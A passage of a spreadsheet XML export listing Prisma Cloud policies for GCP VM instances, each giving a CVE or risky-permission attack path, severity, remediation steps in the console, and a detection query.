This policy checks for the following risky deployment manager permissions:
'logging.logMetrics.delete', 'logging.logMetrics.update', 'logging.buckets.delete', 'logging.buckets.update', 'logging.logs.delete', 'logging.sinks.delete', 'logging.sinks.update'.
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the GCP VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the GCP VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2835"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35" t="inlineStr"/>
      <c r="Z2835" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance with permissions to disrupt logging') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2835" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2835" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2835" t="inlineStr"/>
      <c r="AD2835" t="b">
        <v>1</v>
      </c>
      <c r="AE2835" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2835" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>589da93e-1762-44ff-9e04-ee2920e6c99e</t>
        </is>
      </c>
      <c r="AI2835" t="inlineStr">
        <is>
          <t>d207d25b-ce48-4728-b5d8-52feec68a7b3</t>
        </is>
      </c>
      <c r="AJ2835" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2835" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2836">
      <c r="A2836" t="inlineStr"/>
      <c r="B2836" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2836" s="2" t="inlineStr"/>
      <c r="D2836" t="inlineStr"/>
      <c r="E2836" t="inlineStr"/>
      <c r="F2836" t="inlineStr"/>
      <c r="G2836" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2836" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2836" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable GCP VM instance [Kubernetes, CVE-2022-2385]</t>
        </is>
      </c>
      <c r="L2836" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2836" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2836" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2836" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2836" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2836" t="inlineStr"/>
      <c r="R2836" t="inlineStr"/>
      <c r="S2836" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2836" t="b">
        <v>0</v>
      </c>
      <c r="U2836" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2836" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2836" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-2385].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Kubernetes [CVE-2022-2385] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X283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CVE-2022-2385
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-2385</t>
        </is>
      </c>
      <c r="Y2836" t="inlineStr"/>
      <c r="Z2836" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-2385'))</t>
        </is>
      </c>
      <c r="AA2836" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2836" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2836" t="inlineStr"/>
      <c r="AD2836" t="b">
        <v>1</v>
      </c>
      <c r="AE2836" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2836" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>e41a5204-f180-4510-a1b6-7b5e6c61d9ef</t>
        </is>
      </c>
      <c r="AI2836" t="inlineStr">
        <is>
          <t>7c7ed253-d12b-4b6b-9ad4-405b432a9e53</t>
        </is>
      </c>
      <c r="AJ2836" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2836" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2837">
      <c r="A2837" t="inlineStr"/>
      <c r="B2837" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2837" s="2" t="inlineStr"/>
      <c r="D2837" t="inlineStr"/>
      <c r="E2837" t="inlineStr"/>
      <c r="F2837" t="inlineStr"/>
      <c r="G2837" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2837" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2837" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance [Apache, CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L2837" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2837" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2837" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2837" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2837" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2837" t="inlineStr"/>
      <c r="R2837" t="inlineStr"/>
      <c r="S2837" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2837" t="b">
        <v>0</v>
      </c>
      <c r="U2837" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2837" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2837" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2022-42889].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Apache [CVE-2022-42889] vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2837"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CVE-2022-42889
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-42889</t>
        </is>
      </c>
      <c r="Y2837" t="inlineStr"/>
      <c r="Z2837" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-42889'))</t>
        </is>
      </c>
      <c r="AA2837" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2837" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2837" t="inlineStr"/>
      <c r="AD2837" t="b">
        <v>1</v>
      </c>
      <c r="AE2837" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2837" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>02e249c0-c6ea-445b-8410-41ad3db9822f</t>
        </is>
      </c>
      <c r="AI2837" t="inlineStr">
        <is>
          <t>e5b74930-4f5b-4f86-893c-940f97604d74</t>
        </is>
      </c>
      <c r="AJ2837" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2837" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2838">
      <c r="A2838" t="inlineStr"/>
      <c r="B2838" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2838" s="2" t="inlineStr"/>
      <c r="D2838" t="inlineStr"/>
      <c r="E2838" t="inlineStr"/>
      <c r="F2838" t="inlineStr"/>
      <c r="G2838" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2838" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2838" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Atlassian Confluence Server/Data Center, CVE-2022-26134)</t>
        </is>
      </c>
      <c r="L2838" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2838" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2838" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2838" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2838" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2838" t="inlineStr"/>
      <c r="R2838" t="inlineStr"/>
      <c r="S2838" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2838" t="b">
        <v>0</v>
      </c>
      <c r="U2838" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2838" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2838" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2022-26134).
Remote code execution vulnerability would allow an attacker to execute arbitrary code on the host operating system, potentially leading to system compromise, data breaches and escalate privileges to launch further attacks. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Atlassian Confluence Server/Data Center Remote code execution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Atlassian Confluence Server/Data Center (CVE-2022-26134) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2838"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CVE-2022-26134
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-26134</t>
        </is>
      </c>
      <c r="Y2838" t="inlineStr"/>
      <c r="Z2838" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-26134'))</t>
        </is>
      </c>
      <c r="AA2838" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2838" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:09</t>
        </is>
      </c>
      <c r="AC2838" t="inlineStr"/>
      <c r="AD2838" t="b">
        <v>1</v>
      </c>
      <c r="AE2838" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2838" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>f73e7721-90f2-4833-b505-d38ebc7b9d99</t>
        </is>
      </c>
      <c r="AI2838" t="inlineStr">
        <is>
          <t>2bab01f7-c77f-4791-9728-e44bae4c5e62</t>
        </is>
      </c>
      <c r="AJ2838" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2838" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2839">
      <c r="A2839" t="inlineStr"/>
      <c r="B2839" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2839" s="2" t="inlineStr"/>
      <c r="D2839" t="inlineStr"/>
      <c r="E2839" t="inlineStr"/>
      <c r="F2839" t="inlineStr"/>
      <c r="G2839" t="b">
        <v>1</v>
      </c>
      <c r="H28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39" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2839" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2839" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Oracle WebLogic Server, CVE-2020-14882, CVE-2020-14883]</t>
        </is>
      </c>
      <c r="L2839" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2839" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2839" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2839" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2839" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2839" t="inlineStr"/>
      <c r="R2839" t="inlineStr"/>
      <c r="S2839" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2839" t="b">
        <v>0</v>
      </c>
      <c r="U2839" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2839" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2839" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Oracle WebLogic Server, CVE-2020-14882, CVE-2020-14883]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Oracle WebLogic Server software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Oracle WebLogic Server [CVE-2020-14882, CVE-2020-14883] vulnerabilities reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2839" t="inlineStr">
        <is>
          <t>[WAAS]
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
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2020-14882
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2020-14882
   https://nvd.nist.gov/vuln/detail/CVE-2020-14883</t>
        </is>
      </c>
      <c r="Y2839" t="inlineStr"/>
      <c r="Z2839" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2020-14882, CVE-2020-14883 - WebLogic RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2020-14882', 'CVE-2020-14883'))</t>
        </is>
      </c>
      <c r="AA2839" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2839" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:31</t>
        </is>
      </c>
      <c r="AC2839" t="inlineStr"/>
      <c r="AD2839" t="b">
        <v>1</v>
      </c>
      <c r="AE2839" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2839" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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39" t="inlineStr">
        <is>
          <t>5943297a-70e3-4d78-ad29-480091c17d48</t>
        </is>
      </c>
      <c r="AI2839" t="inlineStr">
        <is>
          <t>35d0fed7-f9e1-4dd0-94a8-1218e62273f7</t>
        </is>
      </c>
      <c r="AJ2839" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2839" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2840">
      <c r="A2840" t="inlineStr"/>
      <c r="B2840" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2840" s="2" t="inlineStr"/>
      <c r="D2840" t="n">
        <v>801</v>
      </c>
      <c r="E2840" t="n">
        <v>0</v>
      </c>
      <c r="F2840" t="n">
        <v>0</v>
      </c>
      <c r="G2840" t="b">
        <v>1</v>
      </c>
      <c r="H28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840" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2840" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2840" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with Cloud Run Creation permissions</t>
        </is>
      </c>
      <c r="L2840" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2840" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2840" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2840" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2840" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2840" t="inlineStr"/>
      <c r="R2840" t="inlineStr"/>
      <c r="S2840" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2840" t="b">
        <v>0</v>
      </c>
      <c r="U2840" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2840" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2840" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have Cloud Run creation permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. GCP VM instance with Cloud Run creation permissions along with Service Account impersonation privileges would be able to escalate their permissions by creating an instance that performs attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploit the environment. 
This policy checks for the following Cloud Run permissions:
'run.services.create', 'run.routes.invoke', 'iam.serviceAccounts.actAs'
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2840" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to the GCP VM instance by modifying VPC Firewall rules
1. Log in to the GCP console
2. Navigate to the Compute Engine dashboard
3. Identify the reported VM instance that you want to restrict public access
4. Under the 'Network interfaces' section, click on the resource mentioned under 'Network'
5. In the 'VPC network details' page, go to the 'FIREWALLS' tab
6. Click on the firewall rules that allow unrestricted access (0.0.0.0/0)
7. Select 'EDIT' under 'Source IPv4 ranges', remove (0.0.0.0/0), and add a trusted IP address
8. Click 'Save' to apply the changes
[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance and note the Service account name under the 'API and identity management' section
3. Navigate to the IAM service
4. Find the binding between the service account used by the Compute Engine instance and the Admin role
5. Remove the binding
6. Create a new binding with a predefined or custom role without risky permissions, if necessary. Repeat if there is a binding of the service account with another Admin role
[VULNERABILITY]
Investigate, assess, prioritise,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Prioritise the vulnerabilities that can be exploited remotely, as they pose a higher risk. Once prioritised, apply patches or updates to fix the vulnerabilities. If patches are not immediately available, consider implementing temporary workarounds or mitigations to reduce the risk until a patch is released.</t>
        </is>
      </c>
      <c r="Y2840" t="inlineStr"/>
      <c r="Z2840" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ( 'gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Instance (VM/Cloud Function) Assigned Cloud Run Creation Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2840" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2840" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:07</t>
        </is>
      </c>
      <c r="AC2840" t="inlineStr"/>
      <c r="AD2840" t="b">
        <v>1</v>
      </c>
      <c r="AE2840" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2840" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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40" t="inlineStr">
        <is>
          <t>fda04891-443e-4f7a-8586-a58d2607bfb0</t>
        </is>
      </c>
      <c r="AI2840" t="inlineStr">
        <is>
          <t>30ce3890-213b-4aee-9979-a972056c4b23</t>
        </is>
      </c>
      <c r="AJ2840" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2840" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2841">
      <c r="A2841" t="inlineStr"/>
      <c r="B2841" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2841" s="2" t="inlineStr"/>
      <c r="D2841" t="inlineStr"/>
      <c r="E2841" t="inlineStr"/>
      <c r="F2841" t="inlineStr"/>
      <c r="G2841" t="b">
        <v>1</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2841" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2841" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to publicly exposed and vulnerable GCP VM instance (Argo CD, CVE-2022-24348)</t>
        </is>
      </c>
      <c r="L2841" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2841" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2841" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2841" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2841" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2841" t="inlineStr"/>
      <c r="R2841" t="inlineStr"/>
      <c r="S2841" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2841" t="b">
        <v>0</v>
      </c>
      <c r="U2841" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2841" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2841" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Sensitive data exposure vulnerability (CVE-2022-24348).
Sensitive data exposure vulnerability would allow an attacker to access sensitive information such as secrets, passwords, and API keys. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Argo CD Sensitive data exposure vulnerability on the publicly exposed GCP VM instance would allow an attacker to gain full control of the host and further move laterally to compromise other resources. This could lead to monetary loss, damage to reputation, and other compliance risks to the organization.
Immediate attention is required to remediate the Argo CD (CVE-2022-24348) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2841"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CVE-2022-24348
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-24348</t>
        </is>
      </c>
      <c r="Y2841" t="inlineStr"/>
      <c r="Z2841" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-24348'))</t>
        </is>
      </c>
      <c r="AA2841" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2841" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:08</t>
        </is>
      </c>
      <c r="AC2841" t="inlineStr"/>
      <c r="AD2841" t="b">
        <v>1</v>
      </c>
      <c r="AE2841" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2841" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>038e8f79-8c49-44f5-ab10-cddcef5755c6</t>
        </is>
      </c>
      <c r="AI2841" t="inlineStr">
        <is>
          <t>c735f32a-3dbd-4905-a09c-56769101316c</t>
        </is>
      </c>
      <c r="AJ2841" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2841" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2842">
      <c r="A2842" t="inlineStr"/>
      <c r="B2842" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2842" s="2" t="inlineStr"/>
      <c r="D2842" t="inlineStr"/>
      <c r="E2842" t="inlineStr"/>
      <c r="F2842" t="inlineStr"/>
      <c r="G2842" t="b">
        <v>1</v>
      </c>
      <c r="H28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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2842" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2842" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (XZ Utils Backdoor, CVE-2024-3094)</t>
        </is>
      </c>
      <c r="L2842" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2842" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2842" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2842" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2842" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2842" t="inlineStr"/>
      <c r="R2842" t="inlineStr"/>
      <c r="S2842" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2842" t="b">
        <v>0</v>
      </c>
      <c r="U2842" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2842" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2842" t="inlineStr">
        <is>
          <t>This policy identifies Google Cloud Platform (GCP) VMs that are publicly exposed and have a known malicious backdoor (Linux XZ Vulnerability, CVE-2024-3094).
CVE-2024-3094 affects XZ Utils and potentially enables unauthorized access through SSH authentication bypass. It boasts a maximum CVSS score of 10.0 and involves malicious code injected into versions 5.6.0 and 5.6.1 of XZ Utils. This backdoor manipulates the liblzma library, utilized for data compression, and permits an attacker to execute arbitrary code (RCE) on the host operating system. The implications include system compromise, data breaches, and the ability to escalate privileges to launch additional attacks.
Given that GCP VMs are publicly exposed, they represent easy targets for attackers seeking to exploit the affected systems. The successful exploitation of this backdoor on publicly exposed GCP VMs would enable an attacker to gain full control of the host, with the potential to move laterally and compromise further resources.
Immediate attention is required to address the Linux (CVE-2024-3094) backdoor and the public exposure of the affected GCP VMs as soon as possible.</t>
        </is>
      </c>
      <c r="X2842" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict Internet exposure of reported VM instance based on your business requirement by modifying VPC firewall rules to the trusted IP address.
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to Internet
4. Update VPC firewall rule that allow Internet access (0.0.0.0/0) to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make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update vulnerable Software for Version 5.6.0 to 5.6.1
   Refer below given URL to obtain more details on the vulnerability and fix,
   https://nvd.nist.gov/vuln/detail/CVE-2024-3094</t>
        </is>
      </c>
      <c r="Y2842" t="inlineStr"/>
      <c r="Z2842" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-3094'))</t>
        </is>
      </c>
      <c r="AA2842" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2842" t="inlineStr">
        <is>
          <t>2024-04-26 08:13:58</t>
        </is>
      </c>
      <c r="AC2842" t="inlineStr"/>
      <c r="AD2842" t="b">
        <v>1</v>
      </c>
      <c r="AE2842" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2842" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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2" t="inlineStr">
        <is>
          <t>60ecae6b-90b0-446f-8580-6e78b30280bc</t>
        </is>
      </c>
      <c r="AI2842" t="inlineStr">
        <is>
          <t>299fa207-cc80-4a18-8fca-3fb1a8a19445</t>
        </is>
      </c>
